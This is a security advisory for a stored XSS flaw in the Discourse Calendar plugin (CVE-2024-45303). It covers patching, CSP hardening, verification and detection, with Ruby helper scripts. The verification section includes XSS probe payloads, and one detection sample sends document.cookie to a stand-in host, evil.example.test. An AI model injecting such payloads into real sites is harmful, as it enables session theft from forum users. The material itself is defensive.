CVE-2024-45303

CVSS base score: 6.1 (MEDIUM)

📋 TL;DR

The Discourse Calendar plugin contains a stored cross-site scripting (XSS) vulnerability: an event name containing markup is rendered without adequate escaping, so a crafted name can execute arbitrary JavaScript in the browser of anyone who views the event. This only affects Discourse sites that have modified or disabled the default Content Security Policy; with the default CSP in place the injected inline script is blocked. Fixed in plugin version 0.5.

💻 Affected Systems

Products:
  • Discourse Calendar plugin
Versions: All versions before 0.5
Operating Systems: All
Default Config Vulnerable: ✅ No
Notes: Only vulnerable if Discourse's default Content Security Policy has been modified or disabled.

📦 What is this software?

Discourse is an open-source forum platform. The Discourse Calendar plugin (discourse-calendar) adds events and calendars to topics; the event name a post author supplies is the value that affected versions render unsafely.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session data the script can reach, perform actions as the victim (including administrative actions if the victim is an admin), deface the site, or redirect users to malicious sites.

🟠

Likely Case

Limited XSS attacks stealing session data or performing unauthorized actions within the Discourse platform.

🟢

If Mitigated

No impact if default Content Security Policy is enabled and properly configured.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation is ordinary stored XSS: the attacker needs to get an event with a crafted name created on the site (normally by posting it), and the site's CSP must already be relaxed or disabled. With the default CSP enforced, the injected inline script is blocked even though the unsafe rendering is still present.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.5

Vendor Advisory: https://github.com/discourse/discourse-calendar/security/advisories/GHSA-rq37-8pf3-4xc8

Restart Required: Yes

Instructions:

1. Update the Discourse Calendar plugin to version 0.5 or later. On standard Docker installs the plugin is cloned during `./launcher rebuild app`, so rebuilding the container pulls the fixed version.
2. Restart (or rebuild) the Discourse application.
3. Verify that CSP is still enabled and enforcing after the update.

🔧 Temporary Workarounds

Enable/Reinforce Content Security Policy

Applies to: all

Re-enable Discourse's default Content Security Policy, or remove any relaxations made to script-src, so that injected inline script is blocked even while the vulnerable rendering is still present.

Check the CSP site settings in the admin panel (the `content_security_policy` setting and any extra sources added to `content_security_policy_script_src`)
Confirm an enforcing Content-Security-Policy header (not only Content-Security-Policy-Report-Only) is present in HTTP responses

🧯 If You Can't Patch

  • Ensure Content Security Policy is enabled and properly configured with script-src directives restricting JavaScript execution.
  • If you render event names yourself (themes, theme components, or custom plugins), HTML-escape on output; input validation alone does not stop stored XSS.
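The bug class and the output-encoding fix side by side, as an added example. This is illustrative Ruby, not the discourse-calendar plugin's code: the `render_event_unsafe` / `render_event_safe` functions and the probe string are constructed for this page.

```ruby
require "erb"

# Illustrative only: a minimal event-name renderer, NOT the
# discourse-calendar plugin's code. It shows the bug class the advisory
# describes (an untrusted event name interpolated into HTML) next to the
# output-encoding fix.

# Vulnerable pattern: raw interpolation of user-controlled text into markup.
def render_event_unsafe(name)
  %(<div class="event-name">#{name}</div>)
end

# Hardened pattern: HTML-escape at the point of output. ERB::Util.html_escape
# turns < > & " ' into entities, so the browser shows the name as text.
# CSP is an independent second layer; it only helps if the policy blocks
# inline script, which is exactly what a relaxed policy no longer does.
def render_event_safe(name)
  %(<div class="event-name">#{ERB::Util.html_escape(name)}</div>)
end

# Constructed probe payload of the kind used to verify the fix on a staging
# site. Harmless on its own: a tag with an alert handler, no exfiltration.
PROBE = %(<img src=x onerror="alert(1)">)

# Crude check for this example: after stripping the wrapper div, is there a
# tag carrying an inline event-handler attribute, or a script tag, that a
# browser would parse as live markup?
def contains_live_markup?(html)
  body = html.sub(%r{\A<div class="event-name">}, "").sub(%r{</div>\z}, "")
  body.match?(/<\w+[^>]*\bon\w+\s*=/i) || body.match?(/<script\b/i)
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe: #{render_event_unsafe(PROBE)}"
  puts "safe:   #{render_event_safe(PROBE)}"
end
```

The escaped output is `&lt;img src=x onerror=&quot;alert(1)&quot;&gt;`, which a browser displays as literal text. Escaping belongs at output time, in the rendering layer, not at input time: the same stored name may later be rendered in contexts with different encoding rules.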

🔍 How to Verify

Check if Vulnerable:

Check the discourse-calendar plugin version in the admin panel (Admin > Plugins) or from the Discourse directory (inside the app container on Docker installs):

bundle exec rails runner 'puts Discourse.plugins.find { |p| p.name == "discourse-calendar" }.metadata.version'

A version below 0.5 is affected if the default CSP has been modified or disabled.

Verify Fix Applied:

Confirm the plugin version is 0.5 or higher. Then, on a staging site, create an event whose name contains a harmless probe such as `<img src=x onerror=alert(1)>` and confirm the name is displayed as literal text rather than interpreted as markup. Check the escaping with CSP enforced as in production; do not weaken the policy to run the test.
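An added audit script covering both the CSP workaround above ("confirm an enforcing CSP header is present") and the version check in this section. It is not part of Discourse or the plugin; `calendar_vulnerable?`, `parse_csp`, `csp_findings` and `fetch_csp` are names introduced here, and the two sample policy strings are constructed for the example. Feed it the version string from the rails runner command and the Content-Security-Policy header from a page response.

```ruby
require "net/http"
require "uri"

# Added audit helpers, not part of Discourse or the calendar plugin. They take
# two inputs you obtain yourself: the plugin version string printed by the
# rails runner command above, and the Content-Security-Policy header from a
# page response. The sample headers below are constructed for this example.

FIXED_VERSION = Gem::Version.new("0.5")

# True when the installed discourse-calendar version predates the fix.
def calendar_vulnerable?(version_string)
  Gem::Version.new(version_string.strip) < FIXED_VERSION
end

# Parse a CSP header into { "directive" => ["source", ...] }.
def parse_csp(header)
  header.split(";").each_with_object({}) do |part, acc|
    tokens = part.strip.split(/\s+/)
    next if tokens.empty? || tokens.first.empty?
    acc[tokens.first.downcase] = tokens.drop(1)
  end
end

# Findings that mean the policy no longer stops injected script. An empty
# array means script-src (or its default-src fallback) is strict enough to
# block an inline payload in an event name. Per CSP3, 'unsafe-inline' is
# ignored by browsers when a nonce or hash source is also present, so that
# combination is not flagged.
def csp_findings(header)
  return ["no Content-Security-Policy header"] if header.nil? || header.strip.empty?

  policy  = parse_csp(header)
  sources = policy["script-src"] || policy["default-src"]
  return ["no script-src or default-src directive"] if sources.nil?

  findings = []
  nonce_or_hash = sources.any? { |s| s.match?(/\A'(nonce-|sha(256|384|512)-)/i) }
  if sources.any? { |s| s.casecmp?("'unsafe-inline'") } && !nonce_or_hash
    findings << "script-src allows 'unsafe-inline': injected inline script runs"
  end
  if sources.any? { |s| %w[* https: http: data:].include?(s.downcase) }
    findings << "script-src allows scripts from any origin or data: URIs"
  end
  findings
end

# Fetch the enforcing header from a live site. The Report-Only variant is
# deliberately not consulted: it logs violations but blocks nothing.
def fetch_csp(url)
  Net::HTTP.get_response(URI(url))["content-security-policy"]
end

# Constructed examples: a nonce-based strict policy and a relaxed one.
STRICT_CSP  = "base-uri 'none'; object-src 'none'; script-src 'nonce-d2f9' 'strict-dynamic'; worker-src 'self'"
RELAXED_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' *"

if __FILE__ == $PROGRAM_NAME
  header = ARGV[0].to_s.start_with?("http") ? fetch_csp(ARGV[0]) : RELAXED_CSP
  findings = csp_findings(header)
  puts(findings.empty? ? "CSP looks strict" : findings.join("\n"))
end
```

Run it with your forum URL as the first argument to inspect the live header, or with no argument to see the findings for the constructed relaxed policy. A site whose only CSP header is Content-Security-Policy-Report-Only counts as unmitigated for this CVE.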

📡 Detection & Monitoring

Log Indicators:

  • CSP violation reports with violated-directive script-src and blocked-uri inline, originating from topic pages that contain events (requires CSP report collection, e.g. Discourse's `content_security_policy_collect_reports` setting)
  • A burst of CSP violation reports from a single topic or a single user's events
  • Event names in the database or application logs containing script tags, inline event-handler attributes, or javascript: URLs

Network Indicators:

  • Browser console CSP violation messages when viewing calendar topics
  • Unexpected outbound requests to attacker-controlled hosts from pages that render events

SIEM Query:

source="discourse" AND (event="csp_violation" OR (message="*calendar*" AND message="*script*") OR message="*XSS*")

The grouping is explicit because AND binds tighter than OR in most query languages; adapt the field names to your log schema.
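The indicators above as runnable triage logic, as an added example that is not part of Discourse. The event names and CSP report lines are constructed for this page; `suspicious_event_name?`, `flagged_event_names` and `inline_script_violations` are names introduced here.

```ruby
require "json"

# Added detection helpers, not part of Discourse. Both sample inputs below are
# constructed for this example: real CSP reports are JSON documents POSTed by
# browsers to the report endpoint named in the policy, and event names come
# from your own database export or application logs.

# Patterns a legitimate event name should never contain. This is a triage
# heuristic, so expect some false positives (e.g. a name containing "online =").
INJECTION_PATTERNS = [
  /<\s*script\b/i,                                # script tag
  /<\s*(svg|img|iframe|object|embed|math)\b/i,    # tags commonly abused for XSS
  /\bon[a-z]+\s*=/i,                              # inline event-handler attribute
  /javascript\s*:/i                               # javascript: URL
].freeze

# Flag an event name whether it is stored raw or entity-encoded.
def suspicious_event_name?(name)
  decoded = name.gsub("&lt;", "<").gsub("&gt;", ">").gsub("&quot;", '"')
  INJECTION_PATTERNS.any? { |re| decoded.match?(re) }
end

def flagged_event_names(names)
  names.select { |n| suspicious_event_name?(n) }
end

# Keep only reports where the browser blocked an inline script, which is what
# a relaxed-but-not-disabled CSP produces when an injected event name is
# rendered. Returns the page URLs so you can inspect the events on them.
def inline_script_violations(report_lines)
  report_lines.map do |line|
    report = (JSON.parse(line)["csp-report"] rescue nil)
    next unless report.is_a?(Hash)
    next unless report["violated-directive"].to_s.start_with?("script-src")
    next unless report["blocked-uri"] == "inline"
    report["document-uri"]
  end.compact
end

SAMPLE_EVENT_NAMES = [
  "Monthly meetup",
  "Picnic <img src=x onerror=alert(document.cookie)>",
  "Q&amp;A session",  # entity-encoded ampersand, legitimate
  "Hack night &lt;script&gt;fetch('https://evil.example.test/?c='+document.cookie)&lt;/script&gt;"
].freeze

SAMPLE_CSP_REPORTS = [
  '{"csp-report":{"document-uri":"https://forum.example.test/t/picnic/42","violated-directive":"script-src","blocked-uri":"inline"}}',
  '{"csp-report":{"document-uri":"https://forum.example.test/latest","violated-directive":"img-src","blocked-uri":"https://tracker.example.test/p.gif"}}',
  'not json at all'
].freeze

if __FILE__ == $PROGRAM_NAME
  puts "flagged names:     #{flagged_event_names(SAMPLE_EVENT_NAMES).inspect}"
  puts "inline violations: #{inline_script_violations(SAMPLE_CSP_REPORTS).inspect}"
end
```

An inline script-src violation on a topic page is the signal that CSP did its job; an event name matching the patterns with no corresponding violation is the case to worry about, because it means the policy was not enforced when the page was viewed.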

🔗 References

  • Vendor advisory: https://github.com/discourse/discourse-calendar/security/advisories/GHSA-rq37-8pf3-4xc8
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-45303